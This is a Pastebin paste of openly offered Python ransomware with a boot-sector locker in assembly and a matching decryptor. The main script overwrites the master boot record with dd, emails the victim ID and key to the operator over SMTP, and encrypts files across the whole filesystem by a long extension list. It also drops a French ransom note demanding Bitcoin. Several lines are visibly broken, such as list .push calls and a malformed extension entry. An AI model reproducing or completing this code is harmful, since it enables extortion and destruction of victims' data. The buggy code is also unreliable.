Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Ransomware.py
- [quode]
- import os
- import sys
- import random
- import struct
- import smtplib
- import string
- import datetime
- import time
- import getpass as gp
- from Crypto.Cipher import AES
- from Crypto.PublicKey import RSA
- from multiprocessing import Pool
- # Function to generate our client ID
- def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
- return ''.join(random.choice(chars) for _ in range(size))
- ID = gen_client_ID(12)
- key = RSA.generate(2048)
- exKey = RSA.exportKey('PEM')
- # Check to see if we're on linux and have root, if so use dd to override the MBR with our bootlocker.
- if sys.platform == 'linux2' and gp.getuser() == 'root':
- try:
- os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
- except:
- pass
- else:
- try:
- os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
- except:
- pass
- def send_ID_Key():
- ts = datetime.datetime.now()
- SERVER = "smtp.gmail.com"
- PORT = 587
- USER = "address@gmail.com" # Specify Username Here
- PASS = "prettyflypassword" # Specify Password Here
- FROM = USER
- TO = ["address@gmail.com"]
- SUBJECT = "Ransomware data: "+str(ts)
- MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
- message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
- try:
- server = smtplib.SMTP()
- server.connect(SERVER, PORT)
- server.starttls()
- server.login(USER, PASS)
- server.sendmail(FROM, TO, message)
- server.quit()
- except Exception as e:
- # print e
- pass
- def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
- if not out_filename:
- out_filename = in_filename + '.crypt'
- iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
- encryptor = AES.new(key, AES.MODE_CBC, iv)
- filesize = os.path.getsize(in_filename)
- with open(in_filename, 'rb') as infile:
- with open(out_filename, 'wb') as outfile:
- outfile.write(struct.pack('<Q', filesize))
- outfile.write(iv)
- while True:
- chunk = infile.read(chunksize)
- if len(chunk) == 0:
- break
- elif len(chunk) % 16 != 0:
- chunk += ' ' * (16 - len(chunk) % 16)
- outfile.write(encryptor.encrypt(chunk))
- def single_arg_encrypt_file(in_filename):
- encrypt_file(key, in_filename)
- def select_files():
- ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
- ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
- ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
- ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
- ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
- ".mov", ".gif", ".txt", ".py", ".pyc", ".jar",".gif",
- ".groups", ".hdd", ".hpp", ".log", ".m2ts", ".m4p", ".mkv",
- ".mpeg", ".ndf", ".nvram", ".ogg", ".ost", ".pab", ".pdb", ".pif",
- ".png", ".qed", ".qcow", ".qcow2", ".rvt", ".st7", ".stm", ".vbox",
- ".vdi", ".vhd", ".vhdx", ".vmdk", ".vmsd", ".vmx", ".vmxf", ".3fr",
- ".3pr", ".ab4", ".accde", ".accdr", ".accdt", ".ach", ".acr", ".adb",
- ".ads", ".agdl", ".ait", ".apj", ".asm", ".awg", ".back", ".backup",
- ".backupdb", ".bay", ".bdb", ".bgt", ".bik", ".bpw", ".cdr3", ".cdr4",
- ".cdr5", ".cdr6", ".cdrw", ".ce1", ".ce2", ".cib", ".craw", ".crw",
- ".csh", ".csl", ".db_journal", ".dc2", ".dcs", ".ddoc", ".ddrw",
- ".der", ".des", ".dgc", ".djvu", ".dng", ".drf", ".dxg", ".eml",
- ".erbsql", ".erf", ".exf", ".ffd", ".fh", ".fhd", ".gray", ".grey",
- ".gry", ".hbk", ".ibd", ".ibz", ".iiq", ".incpas", ".jpe",
- ".kc2", ".kdbx", ".kdc", ".kpdx", ".lua", ".mdc", ".mef", ".mfw",
- ".mmw", ".mny", ".mrw", ".myd", ".ndd", ".nef", ".nk2", ".nop",
- ".nrw", ".ns2", ".ns3", ".ns4", ".nwb", ".nx2", ".nxl", ".nyf",
- ".odb", ".odf", ".odg", ".odm", ".orf", ".otg", ".oth", ".otp",
- ".ots", ".ott", ".p12", ".p7b", ".p7c", ".pdd", ".pem",
- ".plus_muhd", ".plc", ".pot", ".pptx", ".psafe3", ".py",
- ".qba", ".qbr", ".qbw", ".qbx", ".qby", ".raf", ".rat",
- ".raw", ".rdb", ".rwl", ".rwz", ".s3db", ".sd0", ".sda",
- ".sdf", ".sqlite", ".sqlite3", ".sqlitedb", ".sr2", ".srf",
- ".srw", ".st5", ".st8", ".std", ".sti", ".stw", ".stx", ".sxd",
- ".sxg", ".sxi", ".sxm", ".tex", ".wallet", ".wb2", ".wpd",
- ".x11", ".x3f", ".xis", ".ycbcra", ".yuv", ".contact", ".dbx",
- ".doc", ."docx", ".jnt", ".msg", ".oab",".ods", ".pdf", ".pps",
- ".ppsm", ".ppt", ".pptm", ".prf", ".pst", ".rar", ".rtf", ".txt",
- ".wab", ".xls", ".xlsx", ".xml", ".zip", ".1cd", ".7zip", ".accdb",
- ".aoi", ".asf", ".asp", ".aspx", ".asx", ".bak", ".cer", ".cfg",
- ".class", ".config", ".css", ".csv", ".db", ".dds", ".dwg", ".dxf",
- ".flf", ".flv", ".html", ".idx", ".js", ".key", ".kwm", ".laccdb",
- ".ldf", ".lit", ".m3u", ".mbx", ".md", ".mdf", ".mid", ".mlb",
- ".obj", ".odt", ".pages", ".php", ".psd", ".pwm", ".rm", ".safe",
- ".sav", ".save", ".sql", ".srt", ".swf", ".thm", ".vob", ".wav",
- ".wma", ".wmv", ".xlsb", ".3dm", ".aac", ".ai", ".arw", ".cdr",
- ".cls", ".cpi", ".cpp", ".cs", ".db3", ".docm", ".dot", ".dotm",
- ".dotx", ".drw", ".dxb", ".eps", ".fla", ".flac", ".fxg",
- ".java", ".m", ".m4v", ".max", ".mdb", ".pcd", ".pct", ".pl",
- ".potm", ".potx", ".ppam", ".ppsm", ".ppsx", ".pptm", ".ps",
- ".r3d", ".rw2", ".sldm", ".sldx", ".svg", ".tga", ".wps",
- ".xla", ".xlam", ".xlm", ".xlr", ".xlsm", ".xlt", ".xltm",
- ".xltx", ".xlw", ".act", ".adp", ".al", ".bkp", ".blend",
- ".cdf", ".cdx", ".cgm", ".cr2", ".crt", ".dac", ".dbf",
- ".dcr", ".ddd", ".design", ".dtd", ".fdb", ".fff", ".fpx",
- ".h", ".iif", ".indd", ".mos", ".nd", ".nsd", ".nsf",
- ".nsg", ".nsh", ".odc", ".odp", ".oil", ".pas", ".pat",
- ".pef", ".pfx", ".ptx", ".qbb", ".qbm", ".sas7bdat", ".say",
- ".st4", ".st6", ".stc", ".sxc", ".sxw", ".tlg", ".wad",
- ".xlk", ".aiff", ".bin", ".bmp", ".cmt", ".dat", ".dit",
- ".edb", ".flvv"]
- files_to_enc = []
- for root, dirs, files in os.walk("/"):
- for file in files:
- if file.endswith(tuple(ext)):
- files_to_enc.push(os.path.join(root, file))
- # Parallelize execution of encryption function over four subprocesses
- pool = Pool(processes=4)
- pool.map(single_arg_encrypt_file, files_to_enc)
- def note():
- readme = """
- ._______ .______ ._______ .__ __. ______ .__ __
- | ____|| _ \ | ____|| \ | | / || | | |
- | |__ | |_) | | |__ | \| | | ,----'| |__| |
- | __| | / | __| | . ` | | | | __ |
- | | | |\ \----.| |____ | |\ | | `----.| | | |
- |__| | _| `._____||_______||__| \__| \______||__| |__|
- ._______ ._______ ._______ .______ .___ __ ____ ._______ .______
- | \ | ____|| ____|| _ \ \ \ / \ / / | ____|| _ \
- | .--. || |__ | |__ | |_) | \ \/ \/ / | |__ | |_) |
- | | | || __| | __| | ___/ _ \ / | __| | _ <
- | '--' || |____ | |____ | | |_| \ /\ / | |____ | |_) |
- |_______/ |_______||_______|| _| \__/ \__/ |_______||______/
- Bonjour,
- Malheureusement, tous vos fichiers ont été chiffrés avec un cryptage de grade militaire
- il vous sera donc impossible de les récupérer sans acquerir la clé de chiffrement.
- Envoyer 0,5 Bitcoin a "ADRESSE BITCON ICI"
- une fois votre versement éffectuer envoyer nous un email a "ransomware@yopmail.fr"
- avec le numero de la transaction Bitcoin ainsi que votre address email et nous vous enverons
- la clé de chiffrement au plus vite.
- Nous vous remercions de votre patience.
- Bonne journée,
- Le French Deep Web.
- """
- # Windows variant
- # outdir = os.getenv('USERNAME') + "\\Desktop"
- outdir = os.getenv('HOME') + "/Desktop/"
- outfile = outdir + "README"
- handler = open(outputfile, 'w')
- handler.write(outfile, ID)
- handler.close()
- if __name__=="__main__":
- gen_client_ID()
- send_ID_Key()
- try:
- select_files()
- note()
- except Exception as e:
- pass
- [/quode]
- bootlocker.asm
- [quode][BITS 16]
- [ORG 0x7C00]
- MOV SI, Msg
- CALL OutStr
- JMP $
- OutChar:
- MOV AH, 0x0E
- MOV BH, 0x00
- MOV BL, 0x07
- INT 0x10
- RET
- OutStr:
- next_char:
- MOV AL, [SI]
- INC SI
- OR AL, AL
- JZ exit_function
- CALL OutChar
- JMP next_char
- exit_function:
- RET
- Msg db 0xA, 0xD, 0xA, 0xD
- db '################################################################################################', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '# Tous vos fichiers ont été chiffrés avec un cryptage de grade militaire #', 0xA, 0xD
- db '# Il vous sera donc impossible de les récupérer sans acquerir la clé de chiffrement. #', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '# Envoyer 0,5 Bitcoin a "ADRESSE BITCON ICI" #', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '# une fois votre versement éffectuer envoyer nous un email a "ransomware@yopmail.fr" #', 0xA, 0xD
- db '# avec le numero de la transaction Bitcoin ainsi que votre address email #', 0xA, 0xD
- db '# et nous vous enverons #', 0xA, 0xD
- db '# la clé de cryptage ainsi que la méthode pour déchiffrer vos fichiers au plus vite. #', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '# Nous vous remercions de votre patience. #', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '################################################################################################', 0xA, 0xD
- db ' ', 0xA, 0xD
- db '################################################################################################', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '# Malheureusement, il ne vous reste que 7 jours avant que la clé de cryptage ne soit détruite.#', 0xA, 0xD
- db '# Bonne Journée, #', 0xA, 0xD
- db '# Le French Deep Web #', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '################################################################################################', 0
- TIMES 510 - ($ - $$) db 0
- DW 0xAA55
- [/quode]
- Décryption.py
- [quode]
- import os
- import sys
- import struct
- from base64 import b64decode
- from Crypto.Cipher import AES
- from Crypto.PublicKey import RSA
- from multiprocessing import Pool
- # Read in and decode keyfile
- with open('privkey', 'r') as keyfile:
- keyData = keyfile.read().replace('\n', '')
- keyDER = b64decode(keyData)
- key = RSA.importKey(keyDER)
- def decrypt_file(key, in_filename, out_filename=None, chunksize=24*1024):
- # Split .crypt extension to restore file format
- if not out_filename:
- out_filename = os.path.splitext(in_filename)[0]
- with open(in_filename, 'rb') as infile:
- origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
- iv = infile.read(16)
- decryptor = AES.new(key, AES.MODE_CBC, iv)
- with open(out_filename, 'wb') as outfile:
- while True:
- chunk = infile.read(chunksize)
- if len(chunk) == 0:
- break
- outfile.write(decryptor.decrypt(chunk))
- # Truncate file to original size
- outfile.truncate(origsize)
- def single_arg_decrypt_file(in_filename):
- decrypt_file(key, in_filename)
- def select_files():
- # Files to be decrypted are identified by .crypt extension
- ext = ".crypt"
- files_to_dec = []
- for root, dirs, files in os.walk("/"):
- for file in files:
- if file.endswith(str(ext)):
- files_to_dec.push(os.path.join(root, file))
- # Parralelize execution of decrypting function over four sub processes
- pool = Pool(processes=4)
- pool.map(single_arg_decrypt_file, files_to_dec)
- if __name__=="__main__":
- select_files()
- [/quode]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement